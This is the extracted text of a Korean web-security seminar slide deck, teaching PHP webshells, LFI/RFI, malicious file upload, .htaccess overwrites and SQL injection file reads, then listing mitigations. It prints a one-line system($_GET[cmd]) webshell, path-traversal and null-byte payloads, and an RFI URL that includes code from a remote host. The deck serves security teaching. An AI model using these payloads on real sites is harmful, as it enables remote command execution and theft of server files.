Sakuya Izayoi, profile picture
Uploaded bySakuya Izayoi
PPTX, PDF1,172 views

Web vulnerability seminar4

그냥 클릭

Embed presentation

Downloaded 36 times
Web vulnerability seminar Let’s exploit
Contents $ PHP + Source code auditing $ DB + SQLi $ XSS & CSRF $ Something Else $ Finish..?
Something else contents $ Fiddler – Web Proxy Tool $ Webshell $ LFI/RFI $ File up/download (with SQL i)
Proxy Tool
Proxy Tool lists $ Paros $ Burpsuite $ Fiddler …
Request 창 Response 창 Request/Response Trap Packet Capture
패킷생성 작성
Webshell?
Webshell!
Webshell $ php,jsp,asp 등 언어마다 다름 $ 하지만 원리는 비슷함
내용! system($_GET[cmd]);
php.. <textarea name="CONTENT" style="width:100%; height:80%"> <? echo system($_GET[cmd]); ?> </textarea>
웹쉘 실행
이제부터 이걸 쓸 겁니다.
Homepage
과거회상
???.php
결과
경로? $ include(경로) 경로 관련 문자열 : ., /
경로? $ p = zizihacker == ../FI/zizihacker ==../../etc/FI/zizihacker… C:secret 파일을 읽으세요
LFI $ ../../../../../../../secret $ secret.php if(isset($_GET[p])) { $path = $_GET[p].".php"; include($path); echo "<br><br>"; }
With NULL. $ ../../../../../../../secret%00 $ secret if(isset($_GET[p])) { $path = $_GET[p].".php"; include($path); echo "<br><br>"; } %00.php
RFI $ 경로에 원격도 먹히지 않을까? $ 그렇다면 내 서버의 파일을 실행 시키거나 올릴 수 있지 않을까?
RFI
RFI $ 자신이 만든 php를 올려봅시다 $ http://192.168.32.75/RFI.php?p=
Exploit $ http://192.168.32.75/RFI.php?p=http://ip/ path/test.txt%00 $ http://192.168.32.75/RFI.php?p=http://ip/ path/test.txt?
왜?
File upload $ 파일 업로드 > 글쓰기 및 파일 업로드 요청 > FTP에 저장 혹은 DB와 연동
File upload
2가지 취약점이 존재. $ 파일이름을 그대로 씀 $ SQL injection 취약점이 존재
웹쉘을 올려봅시다.
경로를 어떻게 알아야 하나요? 힌트 : ………………………………..
서버설정도 덮어 쓸 수 있음. $ .htaccess $ php.ini $ httpd.conf ...
htaccess 디렉토리 별로 설정을 변경 할 수 있음 magic_quote_gpc engine LFI RFI 관련 기타 여러가지
과거회상
SQl injection $ ‘1,’wer’,’2’),(‘2 + 센스? C:secret 파일을 읽어봅시다.
SQL $ INSERT INTO a,b,c values(‘',0x433a2f736563726574,1234)#’,p ath,ip);
file Download $ SQL 인젝션을 통해 db에 값을 넣고 $ file download 기능을 통해 받는다.
대처방안 LFI $ 경로 관련 문자열 필터링 > 일반적인 파일 이름엔 / 가 들어가지 않음! $ 페이지를 db에 따로 저장 > 관리가 귀찮음.. $ NULL 문자 방지를 위해 magic_quote on > magic_quote_gpc를 켜면 %00=> 0
대처방안 RFI $ 기본옵션에서 막혀 있음.. > allow_url_fopen = off > allow_url_include = off $ 만약 써야 한다면 신뢰할 수 있는 url 이외 엔 drop
대처방안 File upload $ FTP를 사용할 시 anon 계정의 w권한 금지 > 계정 사용 자체를 막는 것도 좋은 방법 $ db와 연동 시 sql 취약점을 잘 판단할 것. > magic_quote_gpc만 켜도 해결되긴 함.. $ 파일이름을 랜덤하게 지정할 것. > 경로 또한 마찬가지
추가. File download $ 요청과 권한을 확인 할 것 > 비 로그인 및 불충분한 권한인지 확인 $ db에서 가져온 값을 그대로 신용하지 말고 체크할 것 $ download 받을 시 인자 값에서 injection 이 발생 할 수도 있음!

More Related Content

PPTX
Web vulnerability seminar2
bySakuya Izayoi
 
PPTX
Web vulnerability seminar3
bySakuya Izayoi
 
PPTX
PHP에서 객체와 데이터 연결 유지
byYoonwhan Lee
 
PPTX
Web vulnerability seminar2
bySakuya Izayoi
 
PDF
Class10
byYoonwhan Lee
 
PDF
PHP를 이용한 간단한 방명록 만들기
byYoonwhan Lee
 
PPTX
MySQL과 PHP
byYoonwhan Lee
 
PDF
레일스 환경 변수
byEugene Park
 
Web vulnerability seminar2
bySakuya Izayoi
 
Web vulnerability seminar3
bySakuya Izayoi
 
PHP에서 객체와 데이터 연결 유지
byYoonwhan Lee
 
Web vulnerability seminar2
bySakuya Izayoi
 
Class10
byYoonwhan Lee
 
PHP를 이용한 간단한 방명록 만들기
byYoonwhan Lee
 
MySQL과 PHP
byYoonwhan Lee
 
레일스 환경 변수
byEugene Park
 

What's hot

PDF
처음배우는 자바스크립트, 제이쿼리 #4
by성일 한
 
PPTX
MySQL 기초
byYoonwhan Lee
 
KEY
vine webdev
bydcfc1997
 
PDF
Mymysql basic sql
byHoyoung Jung
 
PDF
처음배우는 자바스크립트, 제이쿼리 #1
by성일 한
 
PPTX
Cdr with php
by정인 주
 
PDF
MySQL JOIN
byHoyoung Jung
 
PDF
MySQL delete.update
byHoyoung Jung
 
PPTX
Mysql old password 깨기
byHyunSeung Kim
 
PPTX
유니티 REST API를 사용한 파이어 베이스의 데이터 베이스 사용.
byssuser6dd171
 
PDF
Redis edu 2
byDaeMyung Kang
 
PDF
파이썬 웹프로그래밍 1탄
bySeongHyun Ahn
 
PPTX
해킹 기법과 기본상식 by issac
byHerren
 
PDF
Jstl_GETCHA_HANJUNG
byJung Han
 
PPTX
자바스크립트 기초
byEunyoung Hong
 
PDF
챗봇 시작해보기
by성일 한
 
PDF
Laravel 로 배우는 서버사이드 #4
by성일 한
 
PDF
파이썬 데이터베이스 연결 1탄
bySeongHyun Ahn
 
PDF
파이썬 데이터베이스 연결 2탄
bySeongHyun Ahn
 
PPTX
Fluent Python - Chapter 8
bySunghyun Lee
 
처음배우는 자바스크립트, 제이쿼리 #4
by성일 한
 
MySQL 기초
byYoonwhan Lee
 
vine webdev
bydcfc1997
 
Mymysql basic sql
byHoyoung Jung
 
처음배우는 자바스크립트, 제이쿼리 #1
by성일 한
 
Cdr with php
by정인 주
 
MySQL JOIN
byHoyoung Jung
 
MySQL delete.update
byHoyoung Jung
 
Mysql old password 깨기
byHyunSeung Kim
 
유니티 REST API를 사용한 파이어 베이스의 데이터 베이스 사용.
byssuser6dd171
 
Redis edu 2
byDaeMyung Kang
 
파이썬 웹프로그래밍 1탄
bySeongHyun Ahn
 
해킹 기법과 기본상식 by issac
byHerren
 
Jstl_GETCHA_HANJUNG
byJung Han
 
자바스크립트 기초
byEunyoung Hong
 
챗봇 시작해보기
by성일 한
 
Laravel 로 배우는 서버사이드 #4
by성일 한
 
파이썬 데이터베이스 연결 1탄
bySeongHyun Ahn
 
파이썬 데이터베이스 연결 2탄
bySeongHyun Ahn
 
Fluent Python - Chapter 8
bySunghyun Lee
 

Viewers also liked

PDF
Codegate 2013 Junior - Music Player Exploit
bysweetchip
 
PPTX
Variables and constants
byBSCSComputingIT
 
PDF
How to find_vulnerability_in_software
bysanghwan ahn
 
PDF
Software Security - Vulnerability&Attack
byEmanuela Boroș
 
PDF
Fuzzing sucks!
byYury Chemerkin
 
PPTX
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
byJeremy Brown
 
PDF
Web vulnerability seminar1
bySakuya Izayoi
 
PDF
취약점(Vulnerability) db 구조 설명
byeungjin cho
 
PDF
MBFuzzer : MITM Fuzzing for Mobile Applications
byFatih Ozavci
 
PDF
Inc0gnito fuzzing for_fun_sweetchip
bysweetchip
 
PPTX
0-knowledge fuzzing
byVincenzo Iozzo
 
PDF
Fuzzing underestimated method of finding hidden bugs
byPawel Rzepa
 
PPTX
EZ KEY_EZ
byJaesung Lee
 
PDF
[2014 CodeEngn Conference 10] 심준보 - 급전이 필요합니다
byCode Engn
 
PPTX
개발자들이 흔히 실수하는 SQL 7가지
byJungGeun Lee
 
PPTX
초보자를 위한 시스템 해킹 공부 가이드라인
byH4C
 
PDF
FUZZING & SOFTWARE SECURITY TESTING
byMuH4f1Z
 
PPTX
해킹 대회 리뷰 및 실전 해킹
bytotodeung
 
Codegate 2013 Junior - Music Player Exploit
bysweetchip
 
Variables and constants
byBSCSComputingIT
 
How to find_vulnerability_in_software
bysanghwan ahn
 
Software Security - Vulnerability&Attack
byEmanuela Boroș
 
Fuzzing sucks!
byYury Chemerkin
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
byJeremy Brown
 
Web vulnerability seminar1
bySakuya Izayoi
 
취약점(Vulnerability) db 구조 설명
byeungjin cho
 
MBFuzzer : MITM Fuzzing for Mobile Applications
byFatih Ozavci
 
Inc0gnito fuzzing for_fun_sweetchip
bysweetchip
 
0-knowledge fuzzing
byVincenzo Iozzo
 
Fuzzing underestimated method of finding hidden bugs
byPawel Rzepa
 
EZ KEY_EZ
byJaesung Lee
 
[2014 CodeEngn Conference 10] 심준보 - 급전이 필요합니다
byCode Engn
 
개발자들이 흔히 실수하는 SQL 7가지
byJungGeun Lee
 
초보자를 위한 시스템 해킹 공부 가이드라인
byH4C
 
FUZZING & SOFTWARE SECURITY TESTING
byMuH4f1Z
 
해킹 대회 리뷰 및 실전 해킹
bytotodeung
 

Similar to Web vulnerability seminar4

PDF
parameter tampering
byIlsun Choi
 
PDF
Web hacking 개요
byJongseok Choi
 
PDF
[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육
byNAVER D2 STARTUP FACTORY
 
PPTX
컴퓨터보안.pptx
bydalonn
 
PPTX
Owasp에 대하여
byhyeok gyu Kwon
 
PPTX
Pwnable study basic_1
byJ J
 
PPTX
파이널프로젝트 발표자료 Ob_20211101 (2)
bykangsumin
 
PDF
Malware Traffic analysis
byfromitive
 
PPTX
Wow hacker Level7 WriteUp
byhyeok gyu Kwon
 
PDF
[D2 campus seminar]개발자가 꼭 알아야 할 보안이야기
byNAVER D2
 
PDF
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
byChangKyu Song
 
PDF
Mr.Robot CTF Write-Up (Korean version)
bySe-Han Lee
 
PPTX
금융부문 컴퓨터포렌식
by용욱 정
 
PDF
201412 wapples 웹방화벽_시온
by시온시큐리티
 
PPTX
Bitscan appliance
bySanghun Jeon [p4ssion]
 
PPTX
Bitscan appliance
byBitscan
 
PDF
[2007 CodeEngn Conference 01] amesianx - Art of Hooking
byCode Engn
 
PDF
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
byINSIGHT FORENSIC
 
PDF
[무료] 시스템해킹(해커스쿨문제풀이) 공개버전
byJames (SeokHun) Hwang
 
PDF
[2014 CodeEngn Conference 11] 최우석 - 자바스크립트 난독화 너네 뭐니?
byCode Engn
 
parameter tampering
byIlsun Choi
 
Web hacking 개요
byJongseok Choi
 
[네이버D2SF] 안전한 서비스 운영을 위한 Ncloud 보안교육
byNAVER D2 STARTUP FACTORY
 
컴퓨터보안.pptx
bydalonn
 
Owasp에 대하여
byhyeok gyu Kwon
 
Pwnable study basic_1
byJ J
 
파이널프로젝트 발표자료 Ob_20211101 (2)
bykangsumin
 
Malware Traffic analysis
byfromitive
 
Wow hacker Level7 WriteUp
byhyeok gyu Kwon
 
[D2 campus seminar]개발자가 꼭 알아야 할 보안이야기
byNAVER D2
 
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
byChangKyu Song
 
Mr.Robot CTF Write-Up (Korean version)
bySe-Han Lee
 
금융부문 컴퓨터포렌식
by용욱 정
 
201412 wapples 웹방화벽_시온
by시온시큐리티
 
Bitscan appliance
bySanghun Jeon [p4ssion]
 
Bitscan appliance
byBitscan
 
[2007 CodeEngn Conference 01] amesianx - Art of Hooking
byCode Engn
 
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
byINSIGHT FORENSIC
 
[무료] 시스템해킹(해커스쿨문제풀이) 공개버전
byJames (SeokHun) Hwang
 
[2014 CodeEngn Conference 11] 최우석 - 자바스크립트 난독화 너네 뭐니?
byCode Engn
 

Web vulnerability seminar4